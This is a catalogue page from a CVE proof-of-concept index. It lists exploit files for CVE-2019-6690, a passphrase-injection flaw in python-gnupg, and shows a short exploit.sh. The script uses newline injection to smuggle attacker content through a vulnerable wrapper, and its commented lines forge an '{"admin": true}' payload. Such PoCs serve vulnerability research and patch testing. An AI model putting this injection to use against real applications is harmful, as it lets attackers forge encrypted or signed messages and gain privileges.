CVE-2019-6690 – CVE Helper · 32BitZ

CVE Helper 32BITZ

4837 Total CVEs

26 Years

// Info

CVE ID CVE-2019-6690

Year 2019

Type Proof of Concept

Files 8 (7 POC + README)

Source 32BitZ-Studio/Total-POC-CVE

View Folder on GitHub Download POC (.zip) Back to list

// POC Scripts

PL

exploit.pl 1 KB

View Source GitHub Raw

SH

exploit.sh 376 B

View Source GitHub Raw

PY

gnupg.py 55.8 KB

View Source GitHub Raw

PY

server.py 1.6 KB

View Source GitHub Raw

NIX

shell.nix 140 B

View Source GitHub Raw

ORG

talk-hackeriet-ctf-and-python-gnupg.org 7.7 KB

View Source GitHub Raw

PY

vulnerable.py 294 B

View Source GitHub Raw

README.md

Rendering markdown...

POC / exploit.sh SH

⬇ Raw GitHub ✕ Close

#!/usr/bin/env bash

echo -e "p4ssw0rd\n!MALICIOUS MESSAGE!" \
    | ./vulnerable.py > /tmp/msg.gpg

gpg -d --pinentry-mode loopback --passphrase p4ssw0rd /tmp/msg.gpg

#set -ex
#(echo -e "p4ssw0rd\n{\"admin\": true }" | \
# gpg --symmetric -a --pinentry-mode loopback --batch --passphrase-fd 0) \
# > bad.gpg

#(echo "p4ssw0rd"; cat bad.gpg) | ./vulnerable.py harmless_user